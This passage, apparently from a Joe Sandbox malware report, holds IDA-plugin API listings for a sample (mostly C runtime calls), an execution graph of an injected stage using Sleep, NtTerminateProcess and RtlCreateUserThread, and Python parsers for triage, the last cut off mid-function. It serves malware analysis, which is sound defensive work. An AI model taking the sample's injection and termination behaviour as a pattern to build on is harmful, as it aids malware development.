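            m = API_RE.match(line)
            if not m:
                current.unparsed.append(line)
            elif m["sub"]:
                current.subcalls.append((m["sub"].upper(), m["name"], m["module"], m["ref"].upper()))
            else:
                current.apis.append((m["name"], m["module"], m["args"] or "", m["ref"].upper()))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                current.strings.append((m["text"], [x.strip() for x in m["xrefs"].split(",")]))
        else:
            m = KV_RE.match(line)
            if m:
                val = m["val"].strip()
                if val.endswith("Download File"):  # link label fused onto the dump name
                    val = val[: -len("Download File")].rstrip()
                current.meta.setdefault(m["key"], val)
    return records


def looks_like_crt(rec):
    """True when every direct and subcall API is a CRT helper or a CRT-wrapped Win32 import."""
    calls = [(n, m) for n, m, _a, _r in rec.apis] + [(n, m) for _c, n, m, _r in rec.subcalls]
    return bool(calls) and all(m in CRT_MODULES or (m == "KERNEL32" and n in CRT_WIN32)
                               for n, m in calls)


def triage(records):
    """One row per record: direct Win32 calls with their ref addresses, CRT flag, hash prefix."""
    return [{"api_id": r.meta.get("API ID", ""),
             "win32_calls": [(n, ref) for n, mod, _a, ref in r.apis if mod == "KERNEL32"],
             "crt_library": looks_like_crt(r),
             "fuzzy": r.meta.get("Instruction Fuzzy Hash", "")[:8]} for r in records]


if __name__ == "__main__":
    for row in triage(parse_records(SAMPLE)):
        print(row)
```

Records whose only calls are CRT helpers can be dropped from a review queue; the ones that survive the filter are where sample-specific Win32 calls (process, memory and network APIs) will show up, together with the ref addresses to pivot on in the dump. The "Instruction Fuzzy Hash" prefix is kept so records from different reports can be bucketed without re-parsing.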
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 004108E4
                                                                                            • Part of subcall function 00407564: __FF_MSGBANNER.LIBCMT ref: 0040757D
                                                                                            • Part of subcall function 00407564: __NMSG_WRITE.LIBCMT ref: 00407584
                                                                                            • Part of subcall function 00407564: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004099C8,00000000,00000001,00000000,?,0040B869,00000018,00428878,0000000C,0040B8F9), ref: 004075A9
                                                                                          • _free.LIBCMT ref: 004108F7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocHeap_free_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 2734353464-0
                                                                                          • Opcode ID: 1d467cc9796b85702f855dfb741102c0bc3f11cbc9ceba9a698d9b54ddedfc86
                                                                                          • Instruction ID: a64f68f23a471c120e4eb65213a4073683392ff39e647aa3c33ff3e4c235adda
                                                                                          • Opcode Fuzzy Hash: 1d467cc9796b85702f855dfb741102c0bc3f11cbc9ceba9a698d9b54ddedfc86
                                                                                          • Instruction Fuzzy Hash: 5811EE72518314ABEB213B36DD056DA36549F54374B11443BF448BB291DE7CC8D1C69D
                                                                                          APIs
                                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404C34
                                                                                            • Part of subcall function 00406806: _setlocale.LIBCMT ref: 00406818
                                                                                          • _free.LIBCMT ref: 00404C46
                                                                                            • Part of subcall function 0040742E: HeapFree.KERNEL32(00000000,00000000,?,00407335,?), ref: 00407444
                                                                                            • Part of subcall function 0040742E: GetLastError.KERNEL32(?,?,00407335,?), ref: 00407456
                                                                                          • _free.LIBCMT ref: 00404C59
                                                                                          • _free.LIBCMT ref: 00404C6C
                                                                                          • _free.LIBCMT ref: 00404C7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                          • String ID:
                                                                                          • API String ID: 3515823920-0
                                                                                          • Opcode ID: c01ccd7e261bf989ae20c12783c60eba2bcf3e9505bdbc989f39c871c672c71b
                                                                                          • Instruction ID: 0e9e8e0449015c2dbe50d0821f89499f3dca126092a33e8d9313b78239884f77
                                                                                          • Opcode Fuzzy Hash: c01ccd7e261bf989ae20c12783c60eba2bcf3e9505bdbc989f39c871c672c71b
                                                                                          • Instruction Fuzzy Hash: 4C01E5F1905B409BD620DF19D945A17F7E9AF80B10F144A3FF156E3B80E338E8148A57
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 0040A5AD
                                                                                            • Part of subcall function 0040A7CA: __getptd_noexit.LIBCMT ref: 0040A7CD
                                                                                            • Part of subcall function 0040A7CA: __amsg_exit.LIBCMT ref: 0040A7DA
                                                                                          • __getptd.LIBCMT ref: 0040A5C4
                                                                                          • __amsg_exit.LIBCMT ref: 0040A5D2
                                                                                          • __lock.LIBCMT ref: 0040A5E2
                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0040A5F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                          • String ID:
                                                                                          • API String ID: 938513278-0
                                                                                          • Opcode ID: 3f2557cafcd06dcba021e7bd90d791f3a4accec2f9e3d1f72da71f924073079b
                                                                                          • Instruction ID: f61e576fdd48633dfc17ec577e78af812181c97894a17836949014a9695cd5e4
                                                                                          • Opcode Fuzzy Hash: 3f2557cafcd06dcba021e7bd90d791f3a4accec2f9e3d1f72da71f924073079b
                                                                                          • Instruction Fuzzy Hash: 97F06232940310ABD624B776580771A37A0AB00759F61853FE404772D2CB7C59629A9F
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBCMT ref: 0040CD1E
                                                                                            • Part of subcall function 0040CC79: ___BuildCatchObjectHelper.LIBCMT ref: 0040CCAF
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 0040CD35
                                                                                          • ___FrameUnwindToState.LIBCMT ref: 0040CD43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                          • String ID: bad exception
                                                                                          • API String ID: 2163707966-3837556057
                                                                                          • Opcode ID: b045b226de3f4ecbed08ad7a93543d248402277db8486c1c018a92193e619e5b
                                                                                          • Instruction ID: 1604b151629918fba5798a1d122ed43a6cc1dec5c0f6a69f20fd0794fc4e81a6
                                                                                          • Opcode Fuzzy Hash: b045b226de3f4ecbed08ad7a93543d248402277db8486c1c018a92193e619e5b
                                                                                          • Instruction Fuzzy Hash: 68012871400109FBDF126F51CC85EAA3E6AEF19344F00422AFC58241A1D73A9962EBA8
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00407BEC), ref: 0040C52B
                                                                                          • __malloc_crt.LIBCMT ref: 0040C55A
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040C567
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                          • String ID:
                                                                                          • API String ID: 237123855-0
                                                                                          • Opcode ID: 2c9a0001bed0213e2d823ebb639303df66c44cb3b4c28549192758dcaca86337
                                                                                          • Instruction ID: b908ba5a23823a147b76b2a1072a2c5cf161ed95f7bd4d935abcb33acaa7f7dc
                                                                                          • Opcode Fuzzy Hash: 2c9a0001bed0213e2d823ebb639303df66c44cb3b4c28549192758dcaca86337
                                                                                          • Instruction Fuzzy Hash: 44F0547B504130AACB256B35BCC58972629DAD536471A463BF402E3391F6389E4182A9
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __calloc_crt
                                                                                          • String ID: E{
                                                                                          • API String ID: 3494438863-2379582470
                                                                                          • Opcode ID: 7dae7d2af7243379b35f2130778606bf18b7b0e091d1f663d1d74641df695bb4
                                                                                          • Instruction ID: 21273b039d65140231fe6fc662b09ed089a621e42ebc47ac4460ab18e1a39cb8
                                                                                          • Opcode Fuzzy Hash: 7dae7d2af7243379b35f2130778606bf18b7b0e091d1f663d1d74641df695bb4
                                                                                          • Instruction Fuzzy Hash: 8D1194313447114BE7284E2DBC55B662292AF84724764823BE611EA3E0F77CCCA1829E
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00406479
                                                                                            • Part of subcall function 00406DC2: std::exception::exception.LIBCMT ref: 00406DD7
                                                                                            • Part of subcall function 00406DC2: __CxxThrowException@8.LIBCMT ref: 00406DEC
                                                                                            • Part of subcall function 00406DC2: std::exception::exception.LIBCMT ref: 00406DFD
                                                                                            • Part of subcall function 004063F7: std::_Xinvalid_argument.LIBCPMT ref: 0040640A
                                                                                          • _memmove.LIBCMT ref: 004064D4
                                                                                          Strings
                                                                                          • invalid string position, xrefs: 00406474
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                          • String ID: invalid string position
                                                                                          • API String ID: 3404309857-1799206989
                                                                                          • Opcode ID: 84c79e6f14dbaa8a65dc4cdbdbeab40ee90c4a20ff14038d5d74f5b32ef93ac3
                                                                                          • Instruction ID: 13ed7ad951800ee43118e148254108be5ec5ecc04a157a2c78612866fc184e3e
                                                                                          • Opcode Fuzzy Hash: 84c79e6f14dbaa8a65dc4cdbdbeab40ee90c4a20ff14038d5d74f5b32ef93ac3
                                                                                          • Instruction Fuzzy Hash: 921127313002109BDB24AF09C940A2AB3A5EB81724F12093FF857AB3C1CBB9D965C79D
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0040626C
                                                                                            • Part of subcall function 00406DC2: std::exception::exception.LIBCMT ref: 00406DD7
                                                                                            • Part of subcall function 00406DC2: __CxxThrowException@8.LIBCMT ref: 00406DEC
                                                                                            • Part of subcall function 00406DC2: std::exception::exception.LIBCMT ref: 00406DFD
                                                                                          • _memmove.LIBCMT ref: 004062A5
                                                                                          Strings
                                                                                          • invalid string position, xrefs: 00406267
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: invalid string position
                                                                                          • API String ID: 1785806476-1799206989
                                                                                          • Opcode ID: d78e944ce26cc57a3af280aff1534d32ea17bfeabb8d4485b140397885432934
                                                                                          • Instruction ID: c343e07130b7aaef91a56eb7dd84709c1f31448c6ed5a0ef5cdcafd5e8cc6145
                                                                                          • Opcode Fuzzy Hash: d78e944ce26cc57a3af280aff1534d32ea17bfeabb8d4485b140397885432934
                                                                                          • Instruction Fuzzy Hash: A801B9313002019BD724ADA8D9C4827B3A6EBC57107254D7ED483A7781DA79EC5A83A8
                                                                                          APIs
                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00405D42
                                                                                            • Part of subcall function 0040665E: std::ios_base::_Tidy.LIBCPMT ref: 0040667F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::ios_base::_$Ios_base_dtorTidy
                                                                                          • String ID: P\@$\@
                                                                                          • API String ID: 3167631304-203796801
                                                                                          • Opcode ID: 5a6f995303060cf12f29389a6f1b783509563790996d7ad64d5ccf3ceac7200d
                                                                                          • Instruction ID: ba725d234f76f40850094764542e060609f3fd00921f339c6d30fdea895b1c1a
                                                                                          • Opcode Fuzzy Hash: 5a6f995303060cf12f29389a6f1b783509563790996d7ad64d5ccf3ceac7200d
                                                                                          • Instruction Fuzzy Hash: 090192F12047809FC304DF08C885B5ABBE5FB99324F144A2EE555673D1D3799949CB91
                                                                                          APIs
                                                                                            • Part of subcall function 0040843F: __getptd.LIBCMT ref: 00408445
                                                                                            • Part of subcall function 0040843F: __getptd.LIBCMT ref: 00408455
                                                                                          • __getptd.LIBCMT ref: 0040CA93
                                                                                            • Part of subcall function 0040A7CA: __getptd_noexit.LIBCMT ref: 0040A7CD
                                                                                            • Part of subcall function 0040A7CA: __amsg_exit.LIBCMT ref: 0040A7DA
                                                                                          • __getptd.LIBCMT ref: 0040CAA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                          • String ID: csm
                                                                                          • API String ID: 803148776-1018135373
                                                                                          • Opcode ID: cae9b50dc7f6432ec1505a64cd449dab0dc25dd03ad835a6cc2e83fcb2bce8e3
                                                                                          • Instruction ID: 8568da162aace3ff8ac6162b233600a3016fb49417daab1ff872a19e8f129228
                                                                                          • Opcode Fuzzy Hash: cae9b50dc7f6432ec1505a64cd449dab0dc25dd03ad835a6cc2e83fcb2bce8e3
                                                                                          • Instruction Fuzzy Hash: E0010435900209CACB24DFA5D4907AEB2B5AB18311F548A3FE441762D1DF7889929E59
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(?,0040ACA0,00000000,00000000,00000000,00000000,00000000,00411B18,?,0040B6FB,00000003,00407582,00000001,00000000,00000000), ref: 0040AC72
                                                                                          • __invoke_watson.LIBCMT ref: 0040AC8E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: DecodePointer__invoke_watson
                                                                                          • String ID: PNfw
                                                                                          • API String ID: 4034010525-1837848778
                                                                                          • Opcode ID: fc1246884e7f51e9a6e838d80ca4524e67ea3e9af8508650a10a873421f72757
                                                                                          • Instruction ID: 9cbf56c96acde9d93f256939c6b649d798a3283f2b12c158bae67b724239cf21
                                                                                          • Opcode Fuzzy Hash: fc1246884e7f51e9a6e838d80ca4524e67ea3e9af8508650a10a873421f72757
                                                                                          • Instruction Fuzzy Hash: C6E08C32004209BBDF012F62DC0A8AA3F66EF44380B454835FE1490031D636C870DB99
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 00405DC0
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00405DD7
                                                                                            • Part of subcall function 00407A84: _malloc.LIBCMT ref: 00407A9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                          • String ID: K@
                                                                                          • API String ID: 4063778783-2724022444
                                                                                          • Opcode ID: ca18dc120c1246c491a23780bdf6e71784062208f2a468cac672bf6f67ff6a58
                                                                                          • Instruction ID: f5b831de26191e14911e530ecdcf1c5ceaadc4d48ff9e68cb0d8964d3cef158d
                                                                                          • Opcode Fuzzy Hash: ca18dc120c1246c491a23780bdf6e71784062208f2a468cac672bf6f67ff6a58
                                                                                          • Instruction Fuzzy Hash: 50E065715193015AD318EB61D55575F72949F90704F14863FB945A11D0EB38D908C96B
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 004051B9
                                                                                            • Part of subcall function 004073EC: std::exception::operator=.LIBCMT ref: 00407405
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exceptionstd::exception::operator=
                                                                                          • String ID: PK@$PK@
                                                                                          • API String ID: 1598257956-2775078312
                                                                                          • Opcode ID: 6f6ef18ac4411784d2c6e4b971746cbe18b15b3627a4610f38059c669408bcb7
                                                                                          • Instruction ID: 81a9b114ff360e73fd01696416a0da47fd08a242cc9308c949470c5ada236261
                                                                                          • Opcode Fuzzy Hash: 6f6ef18ac4411784d2c6e4b971746cbe18b15b3627a4610f38059c669408bcb7
                                                                                          • Instruction Fuzzy Hash: AED0ECB16046119BC3249F199800846F7F8FFA5320301892FA59897740D3B4A850CB98

                                                                                          Execution Graph

                                                                                          Execution Coverage: 12.6%
                                                                                          Dynamic/Decrypted Code Coverage: 0%
                                                                                          Signature Coverage: 0%
                                                                                          Total number of Nodes: 23
                                                                                          Total number of Limit Nodes: 0
                                                                                          Nodes (id, address, APIs called):
                                                                                          • 667 402ad1
                                                                                          • 668 402ad2
                                                                                          • 670 402b56
                                                                                          • 671 40180c
                                                                                          • 672 40181b
                                                                                          • 673 40183e Sleep
                                                                                          • 675 401859
                                                                                          • 674 40186a NtTerminateProcess
                                                                                          • 676 401876
                                                                                          • 685 401818
                                                                                          • 686 40181b
                                                                                          • 687 40183e Sleep
                                                                                          • 688 401859
                                                                                          • 689 40186a NtTerminateProcess
                                                                                          • 690 401876
                                                                                          • 691 402a9d
                                                                                          • 692 402ad2
                                                                                          • 693 40180c (2 API calls)
                                                                                          • 694 402b56
                                                                                          • 677 402bef
                                                                                          • 678 402cef
                                                                                          • 679 402c19
                                                                                          • 680 402c91 RtlCreateUserThread
                                                                                          Edges (from -> to):
                                                                                          • 667 -> 668
                                                                                          • 668 -> 670, 671
                                                                                          • 671 -> 672
                                                                                          • 672 -> 673
                                                                                          • 673 -> 675
                                                                                          • 675 -> 674
                                                                                          • 674 -> 676
                                                                                          • 676 -> 670
                                                                                          • 685 -> 686
                                                                                          • 686 -> 687
                                                                                          • 687 -> 688
                                                                                          • 688 -> 689
                                                                                          • 689 -> 690
                                                                                          • 691 -> 692
                                                                                          • 692 -> 693, 694
                                                                                          • 693 -> 694
                                                                                          • 677 -> 678, 679
                                                                                          • 679 -> 678, 679 (self-loop), 680
                                                                                          • 680 -> 678
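The execution graphs and control-flow graphs in this report are exported as one whitespace-separated string: a node is `id address [API ...]` (a basic-block node in a control-flow graph carries an address range instead of a single address), an edge is `from->to`, and a node can carry a summary such as `2 API calls` in place of API names. The parser below is an added example written for this page, not Joe Sandbox code. It takes the process-2 execution graph above as its sample input (copied from this report), answers the question a triager actually has, namely which API calls are reachable from a given entry and along which addresses, and tolerates an export whose last node id was cut off, as the second execution graph on this page is. Run on the sample, it shows that the entry at 402ad1 reaches Sleep (the 00001388 argument in the API list below is 5000 ms) and then NtTerminateProcess, while 402bef reaches RtlCreateUserThread; the `2 API calls` annotation on 40180c is dropped rather than reported as an API.

```python
"""Parse the flattened execution_graph / control_flow_graph strings that Joe
Sandbox reports emit and answer reachability questions over them."""
import re
from collections import defaultdict, deque

# Copied from the process-2 (injected stage) execution graph in this report.
STAGE2_EXECUTION_GRAPH = (
    "execution_graph 667 402ad1 668 402ad2 667->668 670 402b56 668->670 671 40180c "
    "668->671 672 40181b 671->672 673 40183e Sleep 672->673 675 401859 673->675 "
    "674 40186a NtTerminateProcess 676 401876 674->676 675->674 676->670 685 401818 "
    "686 40181b 685->686 687 40183e Sleep 686->687 688 401859 687->688 "
    "689 40186a NtTerminateProcess 688->689 690 401876 689->690 691 402a9d 692 402ad2 "
    "691->692 693 40180c 2 API calls 692->693 694 402b56 692->694 693->694 677 402bef "
    "678 402cef 677->678 679 402c19 677->679 679->678 679->679 "
    "680 402c91 RtlCreateUserThread 679->680 680->678"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_NODE_ID = re.compile(r"^\d+$")
# A node body starts with a hex address, or an address range for CFG basic blocks.
_ADDR = re.compile(r"^[0-9a-f]{5,}(?:-[0-9a-f]{5,})?$")
_ANNOTATION = re.compile(r"\b\d+ API calls?\b")   # "2 API calls" is a summary, not an API


def parse_graph(text):
    """Return (nodes, edges, incomplete): nodes maps id -> {'addr', 'apis'},
    edges maps id -> [successor ids], incomplete lists ids whose entry was cut off."""
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    nodes, edges, incomplete = {}, defaultdict(list), []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE.match(tok)
        if edge:
            edges[edge.group(1)].append(edge.group(2))
            current = None
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if _NODE_ID.match(tok) and (nxt is None or _ADDR.match(nxt)):
            if nxt is None:                   # trailing id with no address: truncated export
                nodes[tok] = {"addr": None, "apis": []}
                incomplete.append(tok)
                current = None
                i += 1
            else:
                nodes[tok] = {"addr": nxt, "apis": []}
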